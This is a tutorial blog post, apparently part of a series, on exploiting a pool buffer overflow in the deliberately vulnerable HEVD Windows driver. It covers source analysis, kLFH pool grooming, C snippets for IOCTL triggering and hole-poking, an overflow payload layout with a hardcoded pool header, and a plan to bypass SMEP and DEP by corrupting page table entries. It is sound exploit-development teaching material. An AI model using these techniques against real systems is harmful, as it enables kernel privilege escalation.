Due to the recent release of Windows 11, which will have Virtualization-Based Security (VBS) and Hypervisor Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out new technologies in any enterprise, vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel towards data-only style attacks, or investigate more novel techniques to bypass VBS and HVCI. This is the direction I hope to start taking my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir’s upcoming BlackHat 2021 USA talk found here, Part 1 of this blog series will contain much of the prerequisite knowledge used for this blog post - so although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is determined by a preprocessor directive to make this variable 16 on a 64-bit Windows machine, which we are testing from. We now know that the pool chunk allocated by the call to ExAllocatePoolWithTag within TriggerBufferOverflowNonPagedPoolNx is 16 bytes.

The kernel mode pool chunk, which is now allocated on the NonPagedPoolNx is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a “pool overflow” in this case.

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack the pool overflow code on to the end, after the for loop which does the parsing to extract the base address of HEVD.sys. This code can be seen below, which sends a buffer of 50 bytes to the 16-byte pool chunk. The IOCTL to reach the TriggerBufferOverflowNonPagedPoolNx function is 0x0022204b.
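A minimal sketch of that trigger is shown below; it assumes driverHandle was obtained from CreateFileA against the HEVD device and that <windows.h> and <stdio.h> are included, as in the final exploit listing at the end of this post.

// Trigger the pool overflow: send 50 bytes into the 16-byte NonPagedPoolNx chunk
void triggerOverflow(HANDLE driverHandle)
{
    unsigned char overflowBuffer[50];
    DWORD bytesReturned = 0;

    // Fill the buffer with a recognizable pattern
    memset(overflowBuffer, 0x41, sizeof(overflowBuffer));

    BOOL result = DeviceIoControl(
        driverHandle,
        0x0022204b,             // IOCTL routed to TriggerBufferOverflowNonPagedPoolNx
        overflowBuffer,
        sizeof(overflowBuffer),
        NULL,
        0,
        &bytesReturned,
        NULL
    );

    if (!result)
    {
        printf("[-] DeviceIoControl failed! Error: 0x%lx\n", GetLastError());
    }
}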

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an “integrity” check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH, which is where our allocation resides based on heuristics mentioned in Part 1, being prepended with a _POOL_HEADER structure - we have subsequently corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on the call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check again occurs. This is due to a pool chunk with an invalid header being freed.

This validates that an out-of-bounds write does exist. The question now is, with a kASLR bypass in hand - how do we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot of code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap, when exploiting the kLFH specifically, is to find objects that are the same size as the vulnerable object, contain an interesting member, can be allocated from user mode, and are allocated on the same pool type as the vulnerable object. We can recall earlier that the size of the vulnerable object was 16 bytes. The goal here now is to look at the source code of the driver to determine if there isn't a useful object that we can allocate which will meet all of the specified parameters above. Note again - the toughest part of pool exploitation is finding worthwhile objects.

Luckily, and somewhat contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h, which are useful to us. As the name suggests, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver, look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn't a way to get useful objects in the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).

As we can see, each function definition defines a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELPER_OBJECT_IO object, defined in the above image!

Let’s examine ArbitraryReadWriteHelperNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are being instantiated and leveraged in the functions defined in the above image.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELPER_OBJECT_IO and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let’s inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

  1. A pointer called Name
  2. A SIZE_T variable, Length
  3. An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
  4. An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
  5. A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and allocates this memory to the previously declared pointer Name.

This newly allocated memory is then initialized to zero. The previously declared pointer ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, then has its Name member set to the previously declared pointer Name, which had its memory allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which grabbed the length sent by the user mode client in the IOCTL operation via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure’s values.

Then, an array called g_ARWHelperObjectNonPagedPoolNx, at the index specified by FreeIndex, is initialized to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, and manages such objects. It is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

NTSTATUS
CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
);

This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of another kernel mode object. This means this will be bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let’s update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on the call to ExAllocatePoolWithTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we instantiated the buffer to zero, this is why the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag; the chunk is 0x10 bytes (16 bytes) plus 0x10 bytes for the _POOL_HEADER structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is always created. We know there is also an array of these objects, and the created object for each given CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function call is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

        DbgPrint("[+] Name Length: 0x%X\n", Length);

        //
        // Get a free index
        //

        FreeIndex = GetFreeIndex();

        if (FreeIndex == STATUS_INVALID_INDEX)
        {
            //
            // Failed to get a free index
            //

            Status = STATUS_INVALID_INDEX;
            DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

            return Status;
        }

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NXs, has a value assigned for a given index, which starts at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current value used as the counter is assigned to the value FreeIndex. This value is then passed to the assignment operation used to assign the in-scope ARWHelperObject to the array managing all such objects. This loop occurs MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total amount of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.
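Based on the behavior described above, GetFreeIndex boils down to something like the following sketch (reconstructed from the description rather than copied verbatim from the HEVD source):

INT GetFreeIndex(VOID)
{
    INT FreeIndex = STATUS_INVALID_INDEX;

    // Walk the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers and return
    // the first index that has not yet been assigned an object
    for (INT Index = 0; Index < MAX_OBJECT_COUNT; Index++)
    {
        if (g_ARWHelperObjectNonPagedPoolNx[Index] == NULL)
        {
            FreeIndex = Index;
            break;
        }
    }

    // STATUS_INVALID_INDEX is returned if every slot is already in use
    return FreeIndex;
}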

The tl;dr of what happens here is in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

  1. Create an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object called ARWHelperObject
  2. Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which is initialized to 0
  3. Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
  4. Assign this object to an array which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
  5. Return the address of the ARWHelperObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

NTSTATUS
SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
)

Let’s take a look at what this function will do with our input buffer. Recall last time we were able to specify the length that was used in the operation on the size of the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

  1. A pointer named Name
  2. A pointer named HelperObjectAddress
  3. An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
  4. An NTSTATUS code

After these values are declared, this function first checks to make sure the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, is in user mode. After confirming this, the Name member (a pointer) from this user mode buffer is stored into the previously declared pointer Name. The HelperObjectAddress member from the user mode buffer - which, after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, contained the kernel mode address of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject - is extracted and stored into the HelperObjectAddress variable declared at the beginning of the function.

A call to GetIndexFromPointer is made, with the address of the HelperObjectAddress as the argument in this call. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function will accept a value of any pointer, but realistically this is used for a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. This function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn’t been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn’t called, as this will assign any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array or the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, this function returns the index of the array the given object resides in.

Let’s take a look at the next snippet of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the user mode buffer of type PARW_HELPER_OBJECT_IO’s Name member, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since g_ARWHelperObjectNonPagedPoolNx is, at the end of the day, an array of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let’s test this theory in WinDbg. What we should be looking for here is the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO should be written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which will take the first argument, which is our user-supplied ARW_HELPER_OBJECT_IO, and verify if it is in user mode. We can parse this memory address in WinDbg, which would be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has its Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine, which initializes the Name buffer to 0 (recall that the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag using the Length specified in our ARW_HELPER_OBJECT_IO structure in the DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is one final call to ProbeForRead directly before the memcpy call.

ProbeForRead(
    Name,
    g_ARWHelperObjectNonPagedPoolNx[Index]->Length,
    (ULONG)__alignof(UCHAR)
);

The Name variable here is extracted from the user-mode buffer ARW_HELPER_OBJECT_IO. Since we supplied a value of 0x4141414141414141, this technically isn’t a valid address and the call to ProbeForRead will not be able to locate it. Let’s create a user-mode pointer and leverage it instead!

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now points to the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue here, however, is that the value we can overwrite, ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name, is a pointer which is allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then we could use the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to get the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it up back to user mode. Let’s modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that, after the IOCTL call reaches GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since HelperObjectAddress points to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which is also allocated by ExAllocatePoolWithTag, is freed.

Now that we know all of the ins and outs of the driver’s functionality, we can continue (please note that we are fortunate to have source code in this case; leveraging a disassembler may take a bit more time to come to the same conclusions).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is set currently to the address of a pool allocation via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address to a meaningful address. This will allow for us to corrupt a controlled address - thus allowing us to obtain an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

  1. “Fill the holes” in the current page servicing allocations of size 0x20
  2. Groom the pool to obtain the following layout: VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
  3. Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall earlier the sentiment about needing to preserve _POOL_HEADER structures? This is where everything goes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structures to process and store metadata for pool chunks. This means there is no encoding going on, and it is possible to hardcode the header into the exploit so that, when the pool overflow occurs, the header is overwritten with the same content it had before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Since this is the case, and there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER will be 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit so that, at the time of the overflow into the next chunk (which should be one of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we have previously sprayed), the first 0x10 bytes that are overflowed, the adjacent object’s _POOL_HEADER, are preserved and kept valid, bypassing the invalid-header issue shown earlier.

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

  1. fillHoles()
  2. groomPool()
  3. pokeHoles()

These functions can be seen below.

fillHoles()

groomPool()

pokeHoles()

Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects.
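fillHoles() and groomPool() follow the same object-creation pattern already shown for IOCTL 0x00222063 (fillHoles() appears in the final exploit listing at the end of this post), so only pokeHoles() is sketched here. The delete IOCTL code is not shown in this excerpt, so IOCTL_ARW_DELETE below is a placeholder for the real value, and helperobjectArray is the global array of ARW_HELPER_OBJECT_IO structures populated by the create calls.

// Placeholder for the IOCTL handled by DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler
// (the real code is not shown in this post excerpt)
#define IOCTL_ARW_DELETE 0xDEADBEEF

// Free every other groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX so the freed slots
// can be reclaimed by the vulnerable 16-byte chunks
void pokeHoles(HANDLE driverHandle)
{
    DWORD bytesReturned = 0;

    for (int i = 0; i < 5000; i += 2)
    {
        // HelperObjectAddress was populated by the create IOCTL, so the driver can
        // locate and free the corresponding kernel object
        DeviceIoControl(
            driverHandle,
            IOCTL_ARW_DELETE,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesReturned,
            NULL
        );
    }
}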

Since we have a controlled pool-based overflow, the goal will be to overwrite any of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures with the “vulnerable chunk” that copies memory into the allocation, without any bounds checking. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will both wind up being adjacent to each other theoretically, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a “standalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence “Padding”.

What we actually hope to do here is the following.

We want to use a controlled write to only overwrite the first member of this adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return these values of the Name member as shown in this blog post. The issue we have had so far, however, is the address of the Name member of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to actually corrupt the adjacent chunk(s) with the address of the “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. We would like to use a precise overflow to overwrite the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name value with the address of our “main” object. Currently this value is set to 0x9090909090909090. Once we prove this is possible, we can take this further to obtain the eventual read/write primitive.
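Conceptually, the buffer handed to the vulnerable IOCTL is laid out as in the sketch below: 0x10 bytes to fill the data portion of the vulnerable chunk, the hardcoded _POOL_HEADER of the adjacent chunk, and finally the address that will land on the adjacent object's Name member (mainObject is assumed to be the ARW_HELPER_OBJECT_IO returned by the create IOCTL for the standalone object).

// Sketch of the overflow payload used against IOCTL 0x0022204b
typedef struct _OVERFLOW_BUFFER
{
    ULONG64 VulnChunkData[2];  // 0x10 bytes: fills the rest of the vulnerable chunk
    ULONG64 PoolHeader;        // hardcoded _POOL_HEADER of the adjacent chunk ('Hack' tag)
    ULONG64 Padding;           // second half of the 0x10-byte _POOL_HEADER
    ULONG64 CorruptedName;     // lands on the adjacent object's Name member
} OVERFLOW_BUFFER;

OVERFLOW_BUFFER payload = { 0 };
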